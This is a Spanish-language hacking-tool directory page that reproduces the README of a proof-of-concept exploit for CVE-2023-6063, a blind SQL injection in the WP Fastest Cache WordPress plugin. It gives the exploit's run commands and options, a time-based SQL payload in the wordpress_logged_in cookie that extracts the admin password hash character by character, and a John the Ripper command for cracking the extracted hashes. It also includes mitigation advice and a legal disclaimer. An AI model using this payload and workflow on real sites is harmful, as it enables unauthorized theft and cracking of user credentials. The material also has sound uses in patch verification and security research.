Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/incommatose/cve-2023-6063-poc
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

Una prueba de concepto para CVE-2023-6063, una vulnerabilidad de inyección SQL ciega basada en tiempo en WP Fastest Cache ≤1.2.2.

Ver Repositorio
2139hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC para CVE-2023-6063: Inyección SQL ciega no autenticada en WP Fastest Cache 1.2.2

Static Badge Static Badge Static Badge

Una prueba de concepto para CVE-2023-6063, una vulnerabilidad de inyección SQL ciega basada en tiempo en WP Fastest Cache ≤1.2.2. Extrae contraseñas con hash (user_pass) y correos electrónicos (user_email) de la tabla wp_users abusando de la cookie wordpress_logged_in.

Características

  • Exfiltración de datos basada en tiempo (carácter por carácter) mediante retardos SLEEP().
  • Soporta cookies personalizadas, nombres de usuario objetivo y validación de hash.

Este script extrae:

  • ☑️ Hashes de contraseñas de WordPress (MD5/PHPass).
  • ☑️ Direcciones de correo electrónico asociadas.
  • Argumentos de CLI para pruebas flexibles (--just-hash, --just-email, --debug).

Uso

Instala las dependencias (si no están instaladas):

root@kitploit:~
pip install -r requirements.txt

Uso básico:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

Opciones completas:

root@kitploit:~
  -h, --help            show this help message and exit
  -u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
  --username USERNAME   Define a user to extract its hashed pass
  -d DELAY, --delay DELAY
                        Time for wait web response default 5, minimum 2
  -H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
  --domain DOMAIN       Name of the domain for email validation
  -c COOKIE, --cookie COOKIE
                        Specify a cookie name if it's different on your context
  --status-code STATUS_CODE
                        Use a specific positive status code, default 200
  --debug               More verbosity
  --just-hash           Just extract hashed password
  --just-email          Just extract email value for a user

💻 Demostración

Esta es una demo para el usuario admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Cuando se filtren hashes de contraseñas, usa john o hashcat para descifrarlos con el algoritmo PHPass si la contraseña es vulnerable.

Ejemplo con John:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ Detalles Técnicos

📖 Descripción de la Vulnerabilidad

El plugin WP Fastest Cache (≤1.2.2) para WordPress es vulnerable a una inyección SQL ciega no autenticada a través de la cookie wordpress_logged_in. Los atacantes pueden explotar esta falla para extraer datos sensibles (por ejemplo, hashes de contraseñas, direcciones de correo electrónico) de la tabla wp_users aprovechando retardos basados en tiempo (SLEEP()) en consultas SQL.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 Aviso: Utiliza esta información únicamente para pruebas de seguridad éticas con la autorización adecuada. La explotación no autorizada es ilegal.

  • CVE ID: CVE-2023-6063
  • Puntuación de vulnerabilidad: 7.5 (Alta)
  • Tipo de vulnerabilidad: Inyección SQL (Ciega, Basada en Tiempo)
  • Software afectado: WP Fastest Cache (Plugin de WordPress) ≤ v1.2.2

🔍 Vector de Ataque

  • Explotabilidad: Remota (No se requiere autenticación)
  • Complejidad del ataque: Baja (Explotable mediante peticiones HTTP manipuladas)

🔥 Impacto:

  • Confidencialidad: Alta (Filtra credenciales de administrador)
  • Integridad: Ninguna
  • Disponibilidad: Ninguna

📌 Versiones Afectadas

  • Versiones de WP Fastest Cache ≤1.2.2

🛡️ Mitigación

Actualiza WP Fastest Cache a una versión >1.2.2.

  • Actualiza a WP Fastest Cache v1.2.3 o posterior.
  • Aplica reglas WAF para bloquear payloads de SQLi en cookies.
  • Desactiva el plugin si no se utiliza.

📚 Referencias

  • Entrada NIST NVD
  • Aviso del Plugin de WordPress
  • Detalles del CVE

⚖️ Legal

  • Este script es con fines educativos. Siempre obtén permiso explícito antes de probar.
Descargar herramienta